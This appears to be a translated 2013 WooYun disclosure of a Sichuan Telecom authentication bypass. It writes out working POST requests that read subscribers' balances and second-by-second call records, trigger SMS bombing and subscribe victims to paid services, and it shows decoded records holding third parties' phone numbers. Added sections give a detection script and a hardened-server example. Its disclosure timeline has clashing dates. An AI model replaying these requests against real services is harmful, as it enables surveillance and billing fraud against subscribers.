
Vulnerability summary

Defect ID: wooyun-2013-019542

Title: Sichuan Telecom (四川电信): password verification bypassed to query a subscriber's bills, call detail records, SMS records, data-usage records and other information (not brute force)

Affected vendor: Sichuan Telecom (四川电信)

Author: O.o

Submitted: 2013-03-05 10:46

Fix time: 2013-04-19 10:47

Public disclosure: 2013-04-19 10:47

Vulnerability type: Unauthorized access / authentication bypass

Severity: High

Self-assessed Rank: 20

Status: Handed to a third-party partner (CNCERT, the National Internet Emergency Center) for handling

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure status:

2013-03-05: details reported to the vendor, awaiting vendor handling
2013-03-07: vendor confirmed; details disclosed to the vendor only
2013-03-10: details opened to third-party security partners
2013-05-01: details opened to core white hats and domain experts
2013-05-11: details opened to regular white hats
2013-05-21: details opened to intern white hats
2013-04-19: details disclosed to the public

Brief description:

Is the title long enough? Telecom's "engineers" are a real mess! The key exploitation tool is home-made and won't be released for now. CNCERT, give me a 20!

Detailed description:

Use the tool to generate the user ID that corresponds to a phone number (the tool's own output is shown; the value it emits is 32 hex digits, and the report does not disclose the algorithm):
18980000000
======SC189Checker======
=========Encode=========
7B2AE77D404FD32D62E2E786BA69E990
==========DONE==========
The responses come back encrypted; I wrote a tool of my own to decrypt them.
Retrieve the user's data-usage (flow) information
POST HTTP://wapsc.189.cn:8006/wapLogin/getFlow.action
POST body:
accountid=<user ID>&channelTypeId=001&cityCode=C0713CC421F4E2CF&cityName=%E5%9B%9B%E5%B7%9D+%E6%88%90%E9%83%BD&serviceId=2

======SC189Checker======
=========Decode=========
{"overFlow":"4180643","totalFlow":"4194304","unit":"kb","useFlow":"13661"}
==========DONE==========
Triggering the client login SMS (which directly enables SMS bombing)
POST HTTP://wapsc.189.cn:8006/wapLogin/sendSms.action
Body:
accountid=xxxxxxxxx&channelTypeId=001&cityCode=C0713CC421F4E2CF&cityName=%E5%9B%9B%E5%B7%9D+%E6%88%90%E9%83%BD&serviceId=2
Query balance
POST HTTP://wapsc.189.cn:8006/wapLogin/getReal.action
Body:
accountid=xxxxxxxxxxxxx&channelTypeId=001&cityCode=C0713CC421F4E2CF&cityName=%E5%9B%9B%E5%B7%9D+%E6%88%90%E9%83%BD&serviceId=2

======SC189Checker======
=========Decode=========
{"balanceMsg":"428.94","realMsg":"170.00"}
==========DONE==========
Basic service status (note that this endpoint takes the phone number itself as accNbr, so the ID-derivation step above is not even needed here)
POST HTTP://wapsc.189.cn:8006/BasicBuss/getAllBasicBusiness.action
accNbr=xxxxxxxxxx&channelTypeId=001&cityCode=C0713CC421F4E2CF&cityName=%E5%9B%9B%E5%B7%9D+%E6%88%90%E9%83%BD&serviceId=2

======SC189Checker======
=========Decode=========
[{"accNbr":null,"basicBuinessId":"629","basicBuinessName":"来电显示","isOrder":"1"},{"accNbr":null,"basicBuinessId":"631","basicBuinessName":"呼叫等待","isOrder":"1"},{"accNbr":null,"basicBuinessId":"628","basicBuinessName":"彩铃","isOrder":"1"},{"accNbr":null,"basicBuinessId":"624","basicBuinessName":"遇忙前转","isOrder":"0"},{"accNbr":null,"basicBuinessId":"625","basicBuinessName":"无应答前转","isOrder":"1"},{"accNbr":null,"basicBuinessId":"602","basicBuinessName":"国际漫游语音短信","isOrder":"1"},{"accNbr":null,"basicBuinessId":"622","basicBuinessName":"国际漫游数据业务","isOrder":"0"},{"accNbr":null,"basicBuinessId":"660","basicBuinessName":"国际漫游WIFI","isOrder":"0"}]
==========DONE==========
Self-taught Java =。= the character encoding is a damn pain~
(The service names above, decoded, are caller ID, call waiting, ringback tone, call forwarding on busy, call forwarding on no answer, and international roaming voice/SMS, data and WIFI.)
Plan usage query
POST HTTP://wapsc.189.cn:8006/productMessage/mealUseCase.action
Body:
accountid=xxxxxxxxxxx&channelTypeId=001&cityCode=C0713CC421F4E2CF&cityName=%E5%9B%9B%E5%B7%9D+%E6%88%90%E9%83%BD&serviceId=2

[Call detail records] Yes, you read that right. Itemised records, down to the second! (In the decoded records below, 主叫/被叫 are calling/called party, 省内漫游 is intra-province roaming and 本地市话 is a local call; this endpoint, too, takes the bare phone number as accNbr.)
POST HTTP://wapsc.189.cn:8006/BillDetails/getBillDetail.action
startTime=20130120&endTime=20130121&accNbr=xxxxxxxxxxxxxxxx&type=21&channelTypeId=001&cityCode=C0713CC421F4E2CF&cityName=%E5%9B%9B%E5%B7%9D+%E6%88%90%E9%83%BD&serviceId=2

======SC189Checker======
=========Decode=========
[{"accNbr":"18980000000","accumuCharge":"0.00","billingCommunicateType":"省内漫游","billingType":"","callCharge":"0.00","callDate":"20130301","calledAreaCode":"四川成都","calledNbr":"18708168898","callingAreaCode":"四川南充","duration":"22","endTime":"2013-03-01 10:04:32","internetFlow":"","latnName":"","longCallCharge":"0.00","longCallType":"主叫","monthNo":"201303","otherCharge":"0.00","preferentialCharge":"0.00","startTime":"2013-03-01 10:04:10","sumCallCharge":"0.00","sumDuration":"0","sumInternetFlow":"0.00MB"},{"accNbr":"18980000000","accumuCharge":"0.00","billingCommunicateType":"省内漫游","billingType":"","callCharge":"0.00","callDate":"20130301","calledAreaCode":"四川南充","calledNbr":"18681749777","callingAreaCode":"四川南充","duration":"82","endTime":"2013-03-01 10:27:23","internetFlow":"","latnName":"","longCallCharge":"0.00","longCallType":"被叫","monthNo":"201303","otherCharge":"0.00","preferentialCharge":"0.00","startTime":"2013-03-01 10:26:01","sumCallCharge":"0.00","sumDuration":"0","sumInternetFlow":"0.00MB"},{"accNbr":"18980000000","accumuCharge":"0.00","billingCommunicateType":"省内漫游","billingType":"","callCharge":"0.00","callDate":"20130301","calledAreaCode":"四川南充","calledNbr":"13990883729","callingAreaCode":"四川南充","duration":"29","endTime":"2013-03-01 10:44:43","internetFlow":"","latnName":"","longCallCharge":"0.00","longCallType":"被叫","monthNo":"201303","otherCharge":"0.00","preferentialCharge":"0.00","startTime":"2013-03-01 10:44:14","sumCallCharge":"0.00","sumDuration":"0","sumInternetFlow":"0.00MB"},{"accNbr":"18980000000","accumuCharge":"0.00","billingCommunicateType":"省内漫游","billingType":"","callCharge":"0.00","callDate":"20130301","calledAreaCode":"四川南充","calledNbr":"18681749777","callingAreaCode":"四川南充","duration":"14","endTime":"2013-03-01 10:56:35","internetFlow":"","latnName":"","longCallCharge":"0.00","longCallType":"主叫","monthNo":"201303","otherCharge":"0.00","preferentialCharge":"0.00","startTime":"2013-03-01 10:56:21","sumCallCharge":"0.00","sumDuration":"0","sumInternetFlow":"0.00MB"},{"accNbr":"18980000000","accumuCharge":"0.00","billingCommunicateType":"省内漫游","billingType":"","callCharge":"0.00","callDate":"20130301","calledAreaCode":"四川南充","calledNbr":"13350660000","callingAreaCode":"四川南充","duration":"78","endTime":"2013-03-01 11:52:00","internetFlow":"","latnName":"","longCallCharge":"0.00","longCallType":"被叫","monthNo":"201303","otherCharge":"0.00","preferentialCharge":"0.00","startTime":"2013-03-01 11:50:42","sumCallCharge":"0.00","sumDuration":"0","sumInternetFlow":"0.00MB"},{"accNbr":"18980000000","accumuCharge":"0.00","billingCommunicateType":"省内漫游","billingType":"","callCharge":"0.00","callDate":"20130301","calledAreaCode":"四川成都","calledNbr":"85198738","callingAreaCode":"四川遂宁","duration":"42","endTime":"2013-03-01 11:56:32","internetFlow":"","latnName":"","longCallCharge":"0.00","longCallType":"被叫","monthNo":"201303","otherCharge":"0.00","preferentialCharge":"0.00","startTime":"2013-03-01 11:55:50","sumCallCharge":"0.00","sumDuration":"0","sumInternetFlow":"0.00MB"},{"accNbr":"18980000000","accumuCharge":"0.00","billingCommunicateType":"本地市话","billingType":"","callCharge":"0.00","callDate":"20130301","calledAreaCode":"四川南充","calledNbr":"13989198995","callingAreaCode":"四川成都","duration":"66","endTime":"2013-03-01 16:55:07","internetFlow":"","latnName":"","longCallCharge":"0.00","longCallType":"被叫","monthNo":"201303","otherCharge":"0.00","preferentialCharge":"0.00","startTime":"2013-03-01 16:54:01","sumCallCharge":"0.00","sumDuration":"0","sumInternetFlow":"0.00MB"},{"accNbr":"18980000000","accumuCharge":"0.00","billingCommunicateType":"本地市话","billingType":"","callCharge":"0.00","callDate":"20130301","calledAreaCode":"四川成都","calledNbr":"18708168898","callingAreaCode":"四川成都","duration":"34","endTime":"2013-03-01 17:41:04","internetFlow":"","latnName":"","longCallCharge":"0.00","longCallType":"被叫","monthNo":"201303","otherCharge":"0.00","preferentialCharge":"0.00","startTime":"2013-03-01 17:40:30","sumCallCharge":"0.00","sumDuration":"0","sumInternetFlow":"0.00MB"},{"accNbr":"18980000000","accumuCharge":"0.00","billingCommunicateType":"本地市话","billingType":"","callCharge":"0.00","callDate":"20130301","calledAreaCode":"四川成都","calledNbr":"85158890","callingAreaCode":"四川成都","duration":"12","endTime":"2013-03-01 18:24:01","internetFlow":"","latnName":"","longCallCharge":"0.00","longCallType":"主叫","monthNo":"201303","otherCharge":"0.00","preferentialCharge":"0.00","startTime":"2013-03-01 18:23:49","sumCallCharge":"0.00","sumDuration":"0","sumInternetFlow":"0.00MB"},{"accNbr":"18980000000","accumuCharge":"0.00","billingCommunicateType":"本地市话","billingType":"","callCharge":"0.00","callDate":"20130301","calledAreaCode":"四川成都","calledNbr":"18628049944","callingAreaCode":"四川成都","duration":"37","endTime":"2013-03-01 19:06:35","internetFlow":"","latnName":"","longCallCharge":"0.00","longCallType":"被叫","monthNo":"201303","otherCharge":"0.00","preferentialCharge":"0.00","startTime":"2013-03-01 19:05:58","sumCallCharge":"0.00","sumDuration":"0","sumInternetFlow":"0.00MB"},{"accNbr":"18980000000","accumuCharge":"0.00","billingCommunicateType":"本地市话","billingType":"","callCharge":"0.00","callDate":"20130302","calledAreaCode":"四川成都","calledNbr":"18708168898","callingAreaCode":"四川成都","duration":"32","endTime":"2013-03-02 11:33:41","internetFlow":"","latnName":"","longCallCharge":"0.00","longCallType":"被叫","monthNo":"201303","otherCharge":"0.00","preferentialCharge":"0.00","startTime":"2013-03-02 11:33:09","sumCallCharge":"0.00","sumDuration":"0","sumInternetFlow":"0.00MB"}]
==========DONE==========
There is also remote manipulation of product subscriptions
POST HTTP://wapsc.189.cn:8006/businessOperations/getAllValueAdds.action
accountid=xxxxxxxxxxx&pageSize=10&currentPage=1&fuzzyStr=&doType=TYPE1&orderMsg=&isCall=true&channelTypeId=001&cityCode=C0713CC421F4E2CF&cityName=%E5%9B%9B%E5%B7%9D+%E6%88%90%E9%83%BD&serviceId=2
This returns the current list of value-added services

Find the service you want to activate and note its goodsId
Fetch the product's valueAddId; the request parameter is goodsId
POST HTTP://wapsc.189.cn:8006/businessOperations/BusOperInfo.action HTTP/1.1
accountid=xxxxxxxxxxxxxx&goodsId=100311&channelTypeId=001&cityCode=C0713CC421F4E2CF&cityName=%E5%9B%9B%E5%B7%9D+%E6%88%90%E9%83%BD&serviceId=2

Response (using "QQ加油站" as the example; the decoded goodsName is QQ会员, QQ membership, priced 10, provided by 深圳腾讯公司, Shenzhen Tencent):
======SC189Checker======
=========Decode=========
{"goodsChannel":"ISMP","goodsCode":"123000000000000000434","goodsDesc":"<p>\n &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; QQ会员是腾讯的高端增值业务服务,用户通过手机可使用手机查在线好友、手机更新头像、好友上线通知到手机、手机设置QQ铃声、QQ密码手机安全保护、QQ会员速递通知到手机等功能\n<p>\n &nbsp;<\/p>\n<p>\n 注:此业务属于代扣费(SP)类增值业务。<\/p>\n\n","goodsId":"100311","goodsName":"QQ会员","goodsPrice":"10","service_Company":"深圳腾讯公司"}
==========DONE==========
Take the goodsCode, then
subscribe to any add-on package (the goodsCode is sent as valueAddId)
POST HTTP://wapsc.189.cn:8006/businessOperations/handleBusiness.action HTTP/1.1
accountid=xxxxxxxxx&valueAddId=123000000000000000434&action=1&doType=ISMP&channelTypeId=001&cityCode=C0713CC421F4E2CF&cityName=%E5%9B%9B%E5%B7%9D+%E6%88%90%E9%83%BD&serviceId=2

======SC189Checker======
=========Decode=========
{"effectiveTime":"","expireTime":"20130305103010","message":"成功","resultCode":"0"}
==========DONE==========
Subscription successful! (message 成功 = success, resultCode 0)
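Seen from the server side, the chain above is one client POSTing to a handful of .action endpoints with account identifiers (the derived accountid, or the bare phone number as accNbr) that it never authenticated for, plus repeated sendSms.action calls against one target. The following is an added example, not code from the report, its author or the carrier: it parses constructed access-log lines (the body= field and the log layout are assumptions, since a stock access log does not record POST bodies) and flags clients that cycle through several distinct account identifiers, and targets that receive a burst of login SMS. The account identifiers in the sample are made up.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta
from urllib.parse import parse_qs

# Endpoints named in the report that act on a client-chosen account identifier.
SENSITIVE_ACTIONS = {
    "/wapLogin/getFlow.action",
    "/wapLogin/getReal.action",
    "/wapLogin/sendSms.action",
    "/BasicBuss/getAllBasicBusiness.action",
    "/productMessage/mealUseCase.action",
    "/BillDetails/getBillDetail.action",
    "/businessOperations/getAllValueAdds.action",
    "/businessOperations/BusOperInfo.action",
    "/businessOperations/handleBusiness.action",
}
# Some endpoints take the derived accountid, others the bare phone number (accNbr).
ACCOUNT_PARAMS = ("accountid", "accNbr")

# Assumed log layout (constructed for this example): ip [ts] "request line" status body="..."
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \[(?P<ts>[^\]]+)\] "POST (?P<path>\S+) HTTP/1\.[01]" '
    r'(?P<status>\d{3}) body="(?P<body>[^"]*)"$'
)

# Constructed sample: one client walks three accounts in 90 s, one client makes a
# single lookup, one client fires four login SMS at the same account in 6 s.
# The account identifiers are made up and are not values from the report.
SAMPLE_LOG = """\
203.0.113.7 [05/Mar/2013:10:20:01] "POST /wapLogin/getFlow.action HTTP/1.1" 200 body="accountid=A1B2C3D4E5F60718293A4B5C6D7E8F90&channelTypeId=001&serviceId=2"
203.0.113.7 [05/Mar/2013:10:20:09] "POST /wapLogin/getReal.action HTTP/1.1" 200 body="accountid=0F1E2D3C4B5A69788796A5B4C3D2E1F0&channelTypeId=001&serviceId=2"
203.0.113.7 [05/Mar/2013:10:21:30] "POST /BillDetails/getBillDetail.action HTTP/1.1" 200 body="startTime=20130120&endTime=20130121&accNbr=18980000000&type=21&channelTypeId=001"
198.51.100.2 [05/Mar/2013:10:25:00] "POST /wapLogin/getFlow.action HTTP/1.1" 200 body="accountid=A1B2C3D4E5F60718293A4B5C6D7E8F90&channelTypeId=001&serviceId=2"
198.51.100.9 [05/Mar/2013:10:30:00] "POST /wapLogin/sendSms.action HTTP/1.1" 200 body="accountid=A1B2C3D4E5F60718293A4B5C6D7E8F90&channelTypeId=001&serviceId=2"
198.51.100.9 [05/Mar/2013:10:30:02] "POST /wapLogin/sendSms.action HTTP/1.1" 200 body="accountid=A1B2C3D4E5F60718293A4B5C6D7E8F90&channelTypeId=001&serviceId=2"
198.51.100.9 [05/Mar/2013:10:30:04] "POST /wapLogin/sendSms.action HTTP/1.1" 200 body="accountid=A1B2C3D4E5F60718293A4B5C6D7E8F90&channelTypeId=001&serviceId=2"
198.51.100.9 [05/Mar/2013:10:30:06] "POST /wapLogin/sendSms.action HTTP/1.1" 200 body="accountid=A1B2C3D4E5F60718293A4B5C6D7E8F90&channelTypeId=001&serviceId=2"
"""

def parse_line(line):
    """Return one event dict for a matching log line, or None for anything else."""
    m = LOG_RE.match(line)
    if not m:
        return None
    params = parse_qs(m["body"], keep_blank_values=True)
    account = next((params[p][0] for p in ACCOUNT_PARAMS if p in params), None)
    return {"ip": m["ip"], "path": m["path"], "account": account,
            "ts": datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S")}

def find_enumerators(lines, window=timedelta(minutes=10), threshold=3):
    """Map client ip -> sorted distinct account identifiers, for clients that hit
    sensitive actions with at least `threshold` distinct accounts inside `window`."""
    per_ip = defaultdict(list)
    for line in lines:
        ev = parse_line(line)
        if ev and ev["path"] in SENSITIVE_ACTIONS and ev["account"]:
            per_ip[ev["ip"]].append(ev)
    flagged = {}
    for ip, evs in per_ip.items():
        evs.sort(key=lambda e: e["ts"])
        start = 0                                  # sliding window over time-ordered events
        for end in range(len(evs)):
            while evs[end]["ts"] - evs[start]["ts"] > window:
                start += 1
            distinct = {e["account"] for e in evs[start:end + 1]}
            if len(distinct) >= threshold:
                flagged[ip] = sorted(distinct)
                break
    return flagged

def find_sms_floods(lines, window=timedelta(minutes=1), threshold=3):
    """Map (client ip, target account) -> peak sendSms calls inside any `window`,
    for pairs that reach `threshold`: the SMS-bombing abuse the report points out."""
    per_target = defaultdict(list)
    for line in lines:
        ev = parse_line(line)
        if ev and ev["path"] == "/wapLogin/sendSms.action" and ev["account"]:
            per_target[(ev["ip"], ev["account"])].append(ev["ts"])
    flagged = {}
    for key, stamps in per_target.items():
        stamps.sort()
        start, peak = 0, 0
        for end in range(len(stamps)):
            while stamps[end] - stamps[start] > window:
                start += 1
            peak = max(peak, end - start + 1)
        if peak >= threshold:
            flagged[key] = peak
    return flagged

if __name__ == "__main__":
    lines = SAMPLE_LOG.splitlines()
    print("enumerators:", find_enumerators(lines))
    print("sms floods:", find_sms_floods(lines))
```

The thresholds are deliberately low for the sample; in production they are tuned against the legitimate client, which only ever sends one subscriber's identifier per session, so any second distinct accountid from the same source is already suspicious.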

Proof of vulnerability:

Please copy the content of the detailed description~
If CNCERT or WooYun staff need my crappy decoder to reproduce this, PM me.

Suggested fix:

Try encrypting it one more time, see how that goes~
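Whatever is done to the transport encryption, the defect the vendor response below classifies as an insecure parameter reference is fixed server-side: the account an endpoint acts on must come from a session established by a real login, never from the accountid or accNbr field in the POST body, and the pre-login SMS trigger must be throttled per target. The following is an added example written for this page, not the carrier's code; the subscriber store, session table, password storage and SMS limit are all assumptions. It puts the report's request shape (a getReal-style balance lookup and a sendSms-style login SMS) beside a version that authenticates and authorizes.

```python
import hashlib
import hmac
import secrets
from dataclasses import dataclass

class AuthError(Exception):
    """Unauthenticated, unauthorized, or rate-limited request."""

def _pw_hash(password, salt):
    """PBKDF2-SHA256; a real deployment tunes the iteration count and stores per-user salts."""
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)

# Constructed subscriber store keyed by the opaque accountid the API uses
# (layout assumed for this example; the values are made up).
ACCOUNTS = {
    "acct-A": {"accNbr": "18980000000", "balance": "428.94",
               "salt": b"salt-A", "pw": _pw_hash("correct horse", b"salt-A")},
    "acct-B": {"accNbr": "18980000001", "balance": "12.30",
               "salt": b"salt-B", "pw": _pw_hash("battery staple", b"salt-B")},
}
# Dummy record so login() does the same work for unknown accounts (no timing oracle).
_DUMMY = {"salt": b"dummy", "pw": _pw_hash("", b"dummy")}

# ---- vulnerable shape: what the report exercises ------------------------------
def get_real_vulnerable(params):
    """Balance lookup that trusts the caller's accountid outright: no session,
    no ownership check, so anyone who can name an account can read it."""
    acct = ACCOUNTS.get(params["accountid"])
    if acct is None:
        raise KeyError("unknown account")
    return {"balanceMsg": acct["balance"]}

def send_sms_vulnerable(params):
    """Login-SMS trigger with no throttle: called in a loop it is SMS bombing."""
    return {"resultCode": "0", "target": params["accountid"]}

# ---- hardened shape ------------------------------------------------------------
@dataclass
class Session:
    account_id: str

SESSIONS = {}   # token -> Session; populated only by login()
SMS_SENT = {}   # accountid -> epoch seconds of recent login SMS (assumed store)

def login(account_id, password):
    """Verify the password in constant time, then issue a random session token."""
    acct = ACCOUNTS.get(account_id, _DUMMY)
    ok = hmac.compare_digest(_pw_hash(password, acct["salt"]), acct["pw"])
    if not ok or account_id not in ACCOUNTS:
        raise AuthError("bad credentials")
    token = secrets.token_urlsafe(32)
    SESSIONS[token] = Session(account_id)
    return token

def get_real_hardened(token, params):
    """The account comes from the server-side session. A body accountid is
    honoured only if it matches the session; a mismatch is exactly the probe
    in the report and is refused (and is worth an alert)."""
    sess = SESSIONS.get(token)
    if sess is None:
        raise AuthError("not authenticated")
    if params.get("accountid", sess.account_id) != sess.account_id:
        raise AuthError("accountid does not belong to this session")
    return {"balanceMsg": ACCOUNTS[sess.account_id]["balance"]}

def send_sms_hardened(params, now, limit=3, window=600):
    """The login SMS has to work before login, so it is throttled per target
    account: at most `limit` messages per `window` seconds. Unknown accounts get
    the same reply as known ones so the endpoint is not an existence oracle."""
    account_id = params["accountid"]
    if account_id not in ACCOUNTS:
        return {"resultCode": "0"}
    recent = [t for t in SMS_SENT.get(account_id, []) if now - t <= window]
    if len(recent) >= limit:
        raise AuthError("too many login SMS for this account")
    recent.append(now)
    SMS_SENT[account_id] = recent
    return {"resultCode": "0"}

if __name__ == "__main__":
    print(get_real_vulnerable({"accountid": "acct-B"}))   # readable with no login at all
    tok = login("acct-A", "correct horse")
    print(get_real_hardened(tok, {"accountid": "acct-A"}))
    try:
        get_real_hardened(tok, {"accountid": "acct-B"})
    except AuthError as e:
        print("refused:", e)
```

The same session check applies to every endpoint in the report (getFlow, getAllBasicBusiness, mealUseCase, getBillDetail, getAllValueAdds, BusOperInfo, handleBusiness): the body field is at most a consistency check, never the source of truth, and handleBusiness additionally needs a confirmation step because it changes billing.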

Copyright notice: please credit the source when reprinting: O.o@乌云


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 16

Confirmed: 2013-03-07 22:47

Vendor reply:

With the white hat's close cooperation, CNVD confirmed and reproduced the described situation (including the breaking of a certain encryption algorithm) and on the 7th handed it to the CNCERT Sichuan branch, which is coordinating handling with the local basic telecom operator.
Scored as complete impact on confidentiality and partial impact on availability: base severity score 8.47, technical difficulty coefficient 1.2 (insecure parameter reference + encryption cracking), industry/organization impact coefficient 1.5, overall rank = 8.47*1.2*1.5 = 15.246

Latest status:

2013-03-09: China Telecom Group has recently also learned of this incident and is following it; prompt handling is expected. Awaiting further feedback.


Vulnerability rating:

Comments

  1. 2013-03-05 10:59 | 疯狗 (certified white hat) ( intern white hat | Rank:44 vulns:2 | Having read every vulnerability under heaven, the heart is naturally uncensored. )

    Holy crap, that's serious! I recall a similar vulnerability before; is this an upgraded version? Also, I remember that China Mobile in some region resets the service password based on the last 3 call records; this "call detail record" should be usable against that logic. Sigh, carriers...

  2. 2013-03-05 11:16 | O.o ( regular white hat | Rank:105 vulns:12 | ส็็็็็็็็็็็็็็็็็็็... )

    @疯狗 Telecom works too~

  3. 2013-03-05 11:19 | xsser (certified white hat) ( regular white hat | Rank:254 vulns:18 | When I look back at it all, will this world be all right? )

    No permission check?

  4. 2013-03-05 11:21 | O.o ( regular white hat | Rank:105 vulns:12 | ส็็็็็็็็็็็็็็็็็็็... )

    @xsser None whatsoever~ xsser, got a crush on some Sichuan Telecom girl?

  5. 2013-03-05 11:25 | xsser (certified white hat) ( regular white hat | Rank:254 vulns:18 | When I look back at it all, will this world be all right? )

    @O.o I do, let's talk in private

  6. 2013-03-05 11:27 | O.o ( regular white hat | Rank:105 vulns:12 | ส็็็็็็็็็็็็็็็็็็็... )

    @xsser ok~

  7. 2013-03-05 11:32 | 疯狗 (certified white hat) ( intern white hat | Rank:44 vulns:2 | Having read every vulnerability under heaven, the heart is naturally uncensored. )

    This actually works?

  8. 2013-03-05 11:39 | noah ( regular white hat | Rank:384 vulns:40 )

    ......

  9. 2013-03-05 13:32 | se55i0n ( regular white hat | Rank:1567 vulns:173 )

    Could this be the one I saw -_-|

  10. 2013-04-19 12:50 | 小胖子 (certified white hat) ( core white hat | Rank:1727 vulns:140 | If only the sea could carry away my short ugliness... )

    This folder is so very WooYun-style, can you stop acting cute!!!